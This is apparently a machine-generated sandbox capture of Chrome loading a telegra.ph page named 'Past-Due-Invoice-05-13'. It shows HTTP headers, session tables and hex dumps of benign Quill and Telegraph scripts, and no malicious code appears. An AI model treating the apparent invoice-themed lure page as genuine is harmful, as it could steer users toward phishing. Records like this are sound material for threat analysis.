                                                                                                                                                                                                                            Host: t.me
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                                                            Referer: https://telegra.ph/Past-Due-Invoice-05-13
                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                            2022-05-13 18:46:44 UTC92INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Server: nginx/1.18.0
                                                                                                                                                                                                                            Date: Fri, 13 May 2022 18:46:44 GMT
                                                                                                                                                                                                                            Content-Type: text/javascript
                                                                                                                                                                                                                            Content-Length: 5
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                            Cache-control: no-store
                                                                                                                                                                                                                            Strict-Transport-Security: max-age=35768000
                                                                                                                                                                                                                            2022-05-13 18:46:44 UTC92INData Raw: 2f 2f 20 6f 6b
                                                                                                                                                                                                                            Data Ascii: // ok


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                            11192.168.2.649861149.154.164.13443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                            2022-05-13 18:46:44 UTC346OUTGET /js/quill.min.js?9 HTTP/1.1
                                                                                                                                                                                                                            Host: telegra.ph
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                                                            Referer: https://telegra.ph/Past-Due-Invoice-05-13
                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                            2022-05-13 18:46:44 UTC367INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Server: nginx/1.20.1
                                                                                                                                                                                                                            Date: Fri, 13 May 2022 18:46:44 GMT
                                                                                                                                                                                                                            Content-Type: application/javascript
                                                                                                                                                                                                                            Content-Length: 201847
                                                                                                                                                                                                                            Last-Modified: Thu, 26 Oct 2017 12:06:45 GMT
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            ETag: "59f1cfd5-31477"
                                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2022-05-13 18:46:44 UTC367INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 65 78 70 6f 72 74 73 2e 51 75 69 6c 6c 3d 65 28 29 3a 74 2e 51 75 69 6c 6c 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 72 29 7b 69 66 28 6e 5b 72 5d 29 72 65 74 75 72 6e 20
                                                                                                                                                                                                                            Data Ascii: !function(t,e){"object"==typeof exports&&"object"==typeof module?module.exports=e():"function"==typeof define&&define.amd?define([],e):"object"==typeof exports?exports.Quill=e():t.Quill=e()}(this,function(){return function(t){function e(r){if(n[r])return
                                                                                                                                                                                                                            2022-05-13 18:46:44 UTC383INData Raw: 22 2d 22 29 7d 29 7d 76 61 72 20 6f 3d 74 68 69 73 26 26 74 68 69 73 2e 5f 5f 65 78 74 65 6e 64 73 7c 7c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 75 6e 63 74 69 6f 6e 20 6e 28 29 7b 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 74 7d 66 6f 72 28 76 61 72 20 72 20 69 6e 20 65 29 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 72 29 26 26 28 74 5b 72 5d 3d 65 5b 72 5d 29 3b 74 2e 70 72 6f 74 6f 74 79 70 65 3d 6e 75 6c 6c 3d 3d 3d 65 3f 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 65 29 3a 28 6e 2e 70 72 6f 74 6f 74 79 70 65 3d 65 2e 70 72 6f 74 6f 74 79 70 65 2c 6e 65 77 20 6e 29 7d 2c 69 3d 6e 28 38 29 2c 6c 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 29 7b 74 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74
                                                                                                                                                                                                                            Data Ascii: "-")})}var o=this&&this.__extends||function(t,e){function n(){this.constructor=t}for(var r in e)e.hasOwnProperty(r)&&(t[r]=e[r]);t.prototype=null===e?Object.create(e):(n.prototype=e.prototype,new n)},i=n(8),l=function(t){function e(){t.apply(this,argument
                                                                                                                                                                                                                            2022-05-13 18:46:44 UTC432INData Raw: 2c 6e 3d 69 5b 33 5d 2c 61 2e 63 61 6c 6c 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 2e 65 64 69 74 6f 72 2e 64 65 6c 65 74 65 54 65 78 74 28 74 2c 65 29 7d 2c 6e 2c 74 2c 2d 31 2a 65 29 7d 7d 2c 7b 6b 65 79 3a 22 64 69 73 61 62 6c 65 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 65 6e 61 62 6c 65 28 21 31 29 7d 7d 2c 7b 6b 65 79 3a 22 65 6e 61 62 6c 65 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 21 28 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 30 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 30 5d 29 7c 7c 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3b 74 68 69 73 2e 73 63 72 6f 6c 6c 2e 65 6e 61 62 6c 65 28 74 29 2c 74 68 69 73 2e 63 6f 6e 74 61 69
                                                                                                                                                                                                                            Data Ascii: ,n=i[3],a.call(this,function(){return r.editor.deleteText(t,e)},n,t,-1*e)}},{key:"disable",value:function(){this.enable(!1)}},{key:"enable",value:function(){var t=!(arguments.length>0&&void 0!==arguments[0])||arguments[0];this.scroll.enable(t),this.contai
                                                                                                                                                                                                                            2022-05-13 18:46:44 UTC448INData Raw: 72 6e 21 31 3b 72 65 74 75 72 6e 20 74 79 70 65 6f 66 20 74 3d 3d 74 79 70 65 6f 66 20 65 7d 76 61 72 20 6c 3d 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 73 6c 69 63 65 2c 61 3d 6e 28 32 33 29 2c 73 3d 6e 28 32 34 29 2c 75 3d 74 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 72 65 74 75 72 6e 20 6e 7c 7c 28 6e 3d 7b 7d 29 2c 74 3d 3d 3d 65 7c 7c 28 74 20 69 6e 73 74 61 6e 63 65 6f 66 20 44 61 74 65 26 26 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 44 61 74 65 3f 74 2e 67 65 74 54 69 6d 65 28 29 3d 3d 3d 65 2e 67 65 74 54 69 6d 65 28 29 3a 21 74 7c 7c 21 65 7c 7c 22 6f 62 6a 65 63 74 22 21 3d 74 79 70 65 6f 66 20 74 26 26 22 6f 62 6a 65 63 74 22 21 3d 74 79 70 65 6f 66 20 65 3f 6e 2e 73 74 72 69 63 74 3f 74 3d 3d 3d 65 3a 74 3d
                                                                                                                                                                                                                            Data Ascii: rn!1;return typeof t==typeof e}var l=Array.prototype.slice,a=n(23),s=n(24),u=t.exports=function(t,e,n){return n||(n={}),t===e||(t instanceof Date&&e instanceof Date?t.getTime()===e.getTime():!t||!e||"object"!=typeof t&&"object"!=typeof e?n.strict?t===e:t=
                                                                                                                                                                                                                            2022-05-13 18:46:44 UTC464INData Raw: 29 2c 6b 3d 31 2c 45 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 29 7b 72 65 74 75 72 6e 20 6f 28 74 68 69 73 2c 65 29 2c 69 28 74 68 69 73 2c 28 65 2e 5f 5f 70 72 6f 74 6f 5f 5f 7c 7c 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 65 29 29 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 29 7d 72 65 74 75 72 6e 20 6c 28 65 2c 74 29 2c 73 28 65 2c 5b 7b 6b 65 79 3a 22 61 74 74 61 63 68 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 75 28 65 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 5f 70 72 6f 74 6f 5f 5f 7c 7c 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 65 2e 70 72 6f 74 6f 74 79 70 65 29 2c 22 61 74 74 61 63 68 22 2c 74 68 69 73 29 2e 63 61 6c 6c 28 74 68 69 73 29
                                                                                                                                                                                                                            Data Ascii: ),k=1,E=function(t){function e(){return o(this,e),i(this,(e.__proto__||Object.getPrototypeOf(e)).apply(this,arguments))}return l(e,t),s(e,[{key:"attach",value:function(){u(e.prototype.__proto__||Object.getPrototypeOf(e.prototype),"attach",this).call(this)
                                                                                                                                                                                                                            2022-05-13 18:46:44 UTC480INData Raw: 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 2c 72 2c 6f 2c 69 29 7b 76 61 72 20 61 3d 6c 3f 6c 2b 74 3a 74 3b 69 66 28 21 74 68 69 73 2e 5f 65 76 65 6e 74 73 5b 61 5d 29 72 65 74 75 72 6e 21 31 3b 76 61 72 20 73 2c 75 2c 63 3d 74 68 69 73 2e 5f 65 76 65 6e 74 73 5b 61 5d 2c 66 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 69 66 28 63 2e 66 6e 29 7b 73 77 69 74 63 68 28 63 2e 6f 6e 63 65 26 26 74 68 69 73 2e 72 65 6d 6f 76 65 4c 69 73 74 65 6e 65 72 28 74 2c 63 2e 66 6e 2c 76 6f 69 64 20 30 2c 21 30 29 2c 66 29 7b 63 61 73 65 20 31 3a 72 65 74 75 72 6e 20 63 2e 66 6e 2e 63 61 6c 6c 28 63 2e 63 6f 6e 74 65 78 74 29 2c 21 30 3b 63 61 73 65 20 32 3a 72 65 74 75 72 6e 20 63 2e 66 6e 2e 63 61 6c 6c 28 63 2e 63 6f 6e 74 65 78 74 2c 65 29 2c 21 30 3b 63 61
                                                                                                                                                                                                                            Data Ascii: function(t,e,n,r,o,i){var a=l?l+t:t;if(!this._events[a])return!1;var s,u,c=this._events[a],f=arguments.length;if(c.fn){switch(c.once&&this.removeListener(t,c.fn,void 0,!0),f){case 1:return c.fn.call(c.context),!0;case 2:return c.fn.call(c.context,e),!0;ca
                                                                                                                                                                                                                            2022-05-13 18:46:44 UTC512INData Raw: 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 3b 6e 3c 65 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 7b 76 61 72 20 72 3d 65 5b 6e 5d 3b 72 2e 65 6e 75 6d 65 72 61 62 6c 65 3d 72 2e 65 6e 75 6d 65 72 61 62 6c 65 7c 7c 21 31 2c 72 2e 63 6f 6e 66 69 67 75 72 61 62 6c 65 3d 21 30 2c 22 76 61 6c 75 65 22 69 6e 20 72 26 26 28 72 2e 77 72 69 74 61 62 6c 65 3d 21 30 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 72 2e 6b 65 79 2c 72 29 7d 7d 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 72 29 7b 72 65 74 75 72 6e 20 6e 26 26 74 28 65 2e 70 72 6f 74 6f 74 79 70 65 2c 6e 29 2c 72 26 26 74 28 65 2c 72 29 2c 65 7d 7d 28 29 2c 63 3d 66 75 6e 63 74 69 6f 6e 20 6b 28 74 2c 65 2c 6e 29 7b 6e 75 6c 6c 3d 3d 3d 74 26 26 28 74 3d
                                                                                                                                                                                                                            Data Ascii: (t,e){for(var n=0;n<e.length;n++){var r=e[n];r.enumerable=r.enumerable||!1,r.configurable=!0,"value"in r&&(r.writable=!0),Object.defineProperty(t,r.key,r)}}return function(e,n,r){return n&&t(e.prototype,n),r&&t(e,r),e}}(),c=function k(t,e,n){null===t&&(t=
                                                                                                                                                                                                                            2022-05-13 18:46:44 UTC528INData Raw: 70 65 4f 66 28 74 29 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 3d 6f 3f 76 6f 69 64 20 30 3a 79 28 6f 2c 65 2c 6e 29 7d 69 66 28 22 76 61 6c 75 65 22 69 6e 20 72 29 72 65 74 75 72 6e 20 72 2e 76 61 6c 75 65 3b 76 61 72 20 69 3d 72 2e 67 65 74 3b 69 66 28 76 6f 69 64 20 30 21 3d 3d 69 29 72 65 74 75 72 6e 20 69 2e 63 61 6c 6c 28 6e 29 7d 2c 75 3d 6e 28 32 29 2c 63 3d 72 28 75 29 2c 66 3d 7b 73 63 6f 70 65 3a 63 5b 22 64 65 66 61 75 6c 74 22 5d 2e 53 63 6f 70 65 2e 49 4e 4c 49 4e 45 2c 77 68 69 74 65 6c 69 73 74 3a 5b 22 73 65 72 69 66 22 2c 22 6d 6f 6e 6f 73 70 61 63 65 22 5d 7d 2c 70 3d 6e 65 77 20 63 5b 22 64 65 66 61 75 6c 74 22 5d 2e 41 74 74 72 69 62 75 74 6f 72 2e 43 6c 61 73 73 28 22 66 6f 6e 74 22 2c 22 71 6c 2d 66 6f 6e 74 22 2c 66 29 2c 68 3d 66
                                                                                                                                                                                                                            Data Ascii: peOf(t);return null===o?void 0:y(o,e,n)}if("value"in r)return r.value;var i=r.get;if(void 0!==i)return i.call(n)},u=n(2),c=r(u),f={scope:c["default"].Scope.INLINE,whitelist:["serif","monospace"]},p=new c["default"].Attributor.Class("font","ql-font",f),h=f
                                                                                                                                                                                                                            2022-05-13 18:46:44 UTC544INData Raw: 61 6c 75 65 22 69 6e 20 72 26 26 28 72 2e 77 72 69 74 61 62 6c 65 3d 21 30 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 72 2e 6b 65 79 2c 72 29 7d 7d 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 72 29 7b 72 65 74 75 72 6e 20 6e 26 26 74 28 65 2e 70 72 6f 74 6f 74 79 70 65 2c 6e 29 2c 72 26 26 74 28 65 2c 72 29 2c 65 7d 7d 28 29 2c 73 3d 66 75 6e 63 74 69 6f 6e 20 68 28 74 2c 65 2c 6e 29 7b 6e 75 6c 6c 3d 3d 3d 74 26 26 28 74 3d 46 75 6e 63 74 69 6f 6e 2e 70 72 6f 74 6f 74 79 70 65 29 3b 76 61 72 20 72 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 74 2c 65 29 3b 69 66 28 76 6f 69 64 20 30 3d 3d 3d 72 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 50
                                                                                                                                                                                                                            Data Ascii: alue"in r&&(r.writable=!0),Object.defineProperty(t,r.key,r)}}return function(e,n,r){return n&&t(e.prototype,n),r&&t(e,r),e}}(),s=function h(t,e,n){null===t&&(t=Function.prototype);var r=Object.getOwnPropertyDescriptor(t,e);if(void 0===r){var o=Object.getP
                                                                                                                                                                                                                            2022-05-13 18:46:44 UTC560INData Raw: 28 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 3b 6e 3c 65 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 7b 76 61 72 20 72 3d 65 5b 6e 5d 3b 72 2e 65 6e 75 6d 65 72 61 62 6c 65 3d 72 2e 65 6e 75 6d 65 72 61 62 6c 65 7c 7c 21 31 2c 72 2e 63 6f 6e 66 69 67 75 72 61 62 6c 65 3d 21 30 2c 22 76 61 6c 75 65 22 69 6e 20 72 26 26 28 72 2e 77 72 69 74 61 62 6c 65 3d 21 30 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 72 2e 6b 65 79 2c 72 29 7d 7d 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 72 29 7b 72 65 74 75 72 6e 20 6e 26 26 74 28 65 2e 70 72 6f 74 6f 74 79 70 65 2c 6e 29 2c 72 26 26 74 28 65 2c 72 29 2c 65 7d 7d 28 29 2c 73 3d 66 75 6e 63 74 69 6f 6e 20 64 28 74 2c 65 2c 6e 29 7b
                                                                                                                                                                                                                            Data Ascii: (){function t(t,e){for(var n=0;n<e.length;n++){var r=e[n];r.enumerable=r.enumerable||!1,r.configurable=!0,"value"in r&&(r.writable=!0),Object.defineProperty(t,r.key,r)}}return function(e,n,r){return n&&t(e.prototype,n),r&&t(e,r),e}}(),s=function d(t,e,n){
                                                                                                                                                                                                                            2022-05-13 18:46:44 UTC576INData Raw: 76 67 20 76 69 65 77 62 6f 78 3d 22 30 20 30 20 31 38 20 31 38 22 3e 20 3c 67 20 63 6c 61 73 73 3d 22 71 6c 2d 66 69 6c 6c 20 71 6c 2d 63 6f 6c 6f 72 2d 6c 61 62 65 6c 22 3e 20 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 36 20 36 2e 38 36 38 20 36 20 36 20 35 20 36 20 35 20 37 20 35 2e 39 34 32 20 37 20 36 20 36 2e 38 36 38 22 3e 3c 2f 70 6f 6c 79 67 6f 6e 3e 20 3c 72 65 63 74 20 68 65 69 67 68 74 3d 31 20 77 69 64 74 68 3d 31 20 78 3d 34 20 79 3d 34 3e 3c 2f 72 65 63 74 3e 20 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 36 2e 38 31 37 20 35 20 36 20 35 20 36 20 36 20 36 2e 33 38 20 36 20 36 2e 38 31 37 20 35 22 3e 3c 2f 70 6f 6c 79 67 6f 6e 3e 20 3c 72 65 63 74 20 68 65 69 67 68 74 3d 31 20 77 69 64 74 68 3d 31 20 78 3d 32 20 79 3d 36 3e 3c
                                                                                                                                                                                                                            Data Ascii: vg viewbox="0 0 18 18"> <g class="ql-fill ql-color-label"> <polygon points="6 6.868 6 6 5 6 5 7 5.942 7 6 6.868"></polygon> <rect height=1 width=1 x=4 y=4></rect> <polygon points="6.817 5 6 5 6 6 6.38 6 6.817 5"></polygon> <rect height=1 width=1 x=2 y=6><
                                                                                                                                                                                                                            2022-05-13 18:46:44 UTC592INData Raw: 66 20 45 76 65 6e 74 29 74 68 69 73 2e 73 65 6c 65 63 74 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 6e 65 77 20 45 76 65 6e 74 28 22 63 68 61 6e 67 65 22 29 29 3b 65 6c 73 65 20 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 3d 28 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 45 76 65 6e 74 3f 22 75 6e 64 65 66 69 6e 65 64 22 3a 69 28 45 76 65 6e 74 29 29 29 7b 76 61 72 20 72 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 45 76 65 6e 74 22 29 3b 72 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 68 61 6e 67 65 22 2c 21 30 2c 21 30 29 2c 74 68 69 73 2e 73 65 6c 65 63 74 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 72 29 7d 74 68 69 73 2e 63 6c 6f 73 65 28 29 7d 7d 65 6c 73 65 20 74 68 69 73 2e 6c 61 62 65 6c 2e 72 65 6d 6f 76 65 41 74
                                                                                                                                                                                                                            Data Ascii: f Event)this.select.dispatchEvent(new Event("change"));else if("object"===("undefined"==typeof Event?"undefined":i(Event))){var r=document.createEvent("Event");r.initEvent("change",!0,!0),this.select.dispatchEvent(r)}this.close()}}else this.label.removeAt
                                                                                                                                                                                                                            2022-05-13 18:46:44 UTC608INData Raw: 6f 6c 6c 54 6f 70 3d 74 7d 7d 2c 7b 6b 65 79 3a 22 73 61 76 65 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 74 65 78 74 62 6f 78 2e 76 61 6c 75 65 3b 73 77 69 74 63 68 28 74 68 69 73 2e 72 6f 6f 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 6d 6f 64 65 22 29 29 7b 63 61 73 65 22 6c 69 6e 6b 22 3a 76 61 72 20 65 3d 74 68 69 73 2e 71 75 69 6c 6c 2e 72 6f 6f 74 2e 73 63 72 6f 6c 6c 54 6f 70 3b 74 68 69 73 2e 6c 69 6e 6b 52 61 6e 67 65 3f 28 74 68 69 73 2e 71 75 69 6c 6c 2e 66 6f 72 6d 61 74 54 65 78 74 28 74 68 69 73 2e 6c 69 6e 6b 52 61 6e 67 65 2c 22 6c 69 6e 6b 22 2c 74 2c 79 5b 22 64 65 66 61 75 6c 74 22 5d 2e 73 6f 75 72 63 65 73 2e 55 53 45 52 29 2c 64 65 6c 65 74 65 20 74 68 69 73 2e 6c 69
                                                                                                                                                                                                                            Data Ascii: ollTop=t}},{key:"save",value:function(){var t=this.textbox.value;switch(this.root.getAttribute("data-mode")){case"link":var e=this.quill.root.scrollTop;this.linkRange?(this.quill.formatText(this.linkRange,"link",t,y["default"].sources.USER),delete this.li


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                            12192.168.2.649862149.154.164.13443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                            2022-05-13 18:46:44 UTC367OUTGET /js/core.min.js?63 HTTP/1.1
                                                                                                                                                                                                                            Host: telegra.ph
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                                                            Referer: https://telegra.ph/Past-Due-Invoice-05-13
                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                            2022-05-13 18:46:44 UTC400INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Server: nginx/1.20.1
                                                                                                                                                                                                                            Date: Fri, 13 May 2022 18:46:44 GMT
                                                                                                                                                                                                                            Content-Type: application/javascript
                                                                                                                                                                                                                            Content-Length: 49259
                                                                                                                                                                                                                            Last-Modified: Mon, 11 Apr 2022 15:14:50 GMT
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            ETag: "625445ea-c06b"
                                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2022-05-13 18:46:44 UTC400INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 5f 63 6c 61 73 73 43 61 6c 6c 43 68 65 63 6b 28 74 2c 65 29 7b 69 66 28 21 28 74 20 69 6e 73 74 61 6e 63 65 6f 66 20 65 29 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 43 61 6e 6e 6f 74 20 63 61 6c 6c 20 61 20 63 6c 61 73 73 20 61 73 20 61 20 66 75 6e 63 74 69 6f 6e 22 29 7d 66 75 6e 63 74 69 6f 6e 20 5f 70 6f 73 73 69 62 6c 65 43 6f 6e 73 74 72 75 63 74 6f 72 52 65 74 75 72 6e 28 74 2c 65 29 7b 69 66 28 21 74 29 74 68 72 6f 77 20 6e 65 77 20 52 65 66 65 72 65 6e 63 65 45 72 72 6f 72 28 22 74 68 69 73 20 68 61 73 6e 27 74 20 62 65 65 6e 20 69 6e 69 74 69 61 6c 69 73 65 64 20 2d 20 73 75 70 65 72 28 29 20 68 61 73 6e 27 74 20 62 65 65 6e 20 63 61 6c 6c 65 64 22 29 3b 72
                                                                                                                                                                                                                            Data Ascii: "use strict";function _classCallCheck(t,e){if(!(t instanceof e))throw new TypeError("Cannot call a class as a function")}function _possibleConstructorReturn(t,e){if(!t)throw new ReferenceError("this hasn't been initialised - super() hasn't been called");r
                                                                                                                                                                                                                            2022-05-13 18:46:44 UTC416INData Raw: 73 65 74 28 29 2c 72 2e 6c 65 6e 67 74 68 28 29 2d 31 29 2c 71 75 69 6c 6c 2e 73 65 6c 65 63 74 69 6f 6e 2e 73 63 72 6f 6c 6c 49 6e 74 6f 56 69 65 77 28 29 2c 73 68 6f 77 45 72 72 6f 72 28 22 54 69 74 6c 65 20 69 73 20 74 6f 6f 20 73 6d 61 6c 6c 22 29 7d 76 61 72 20 61 3d 24 28 27 69 6d 67 5b 73 72 63 5e 3d 22 64 61 74 61 3a 22 5d 2c 76 69 64 65 6f 5b 73 72 63 5e 3d 22 64 61 74 61 3a 22 5d 27 29 3b 69 66 28 61 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 20 73 68 6f 77 45 72 72 6f 72 28 22 55 70 6c 6f 61 64 20 69 6e 20 70 72 6f 67 72 65 73 73 2e 5c 6e 50 6c 65 61 73 65 20 77 61 69 74 2e 2e 2e 22 29 3b 76 61 72 20 6e 3d 67 65 74 50 61 67 65 43 6f 6e 74 65 6e 74 28 29 3b 69 66 28 6e 2e 6c 65 6e 67 74 68 3e 36 35 35 33 36 29 72 65 74 75 72 6e 20 73 68 6f 77 45
                                                                                                                                                                                                                            Data Ascii: set(),r.length()-1),quill.selection.scrollIntoView(),showError("Title is too small")}var a=$('img[src^="data:"],video[src^="data:"]');if(a.length)return showError("Upload in progress.\nPlease wait...");var n=getPageContent();if(n.length>65536)return showE
                                                                                                                                                                                                                            2022-05-13 18:46:44 UTC496INData Raw: 68 6f 72 42 6c 6f 74 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 29 7b 72 65 74 75 72 6e 20 5f 63 6c 61 73 73 43 61 6c 6c 43 68 65 63 6b 28 74 68 69 73 2c 65 29 2c 5f 70 6f 73 73 69 62 6c 65 43 6f 6e 73 74 72 75 63 74 6f 72 52 65 74 75 72 6e 28 74 68 69 73 2c 28 65 2e 5f 5f 70 72 6f 74 6f 5f 5f 7c 7c 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 65 29 29 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 29 7d 72 65 74 75 72 6e 20 5f 69 6e 68 65 72 69 74 73 28 65 2c 74 29 2c 5f 63 72 65 61 74 65 43 6c 61 73 73 28 65 2c 5b 7b 6b 65 79 3a 22 66 6f 72 6d 61 74 41 74 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 6f 2c 6c 2c 69 29 7b 6c 3d 3d 3d 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74
                                                                                                                                                                                                                            Data Ascii: horBlot=function(t){function e(){return _classCallCheck(this,e),_possibleConstructorReturn(this,(e.__proto__||Object.getPrototypeOf(e)).apply(this,arguments))}return _inherits(e,t),_createClass(e,[{key:"formatAt",value:function(t,o,l,i){l===this.construct
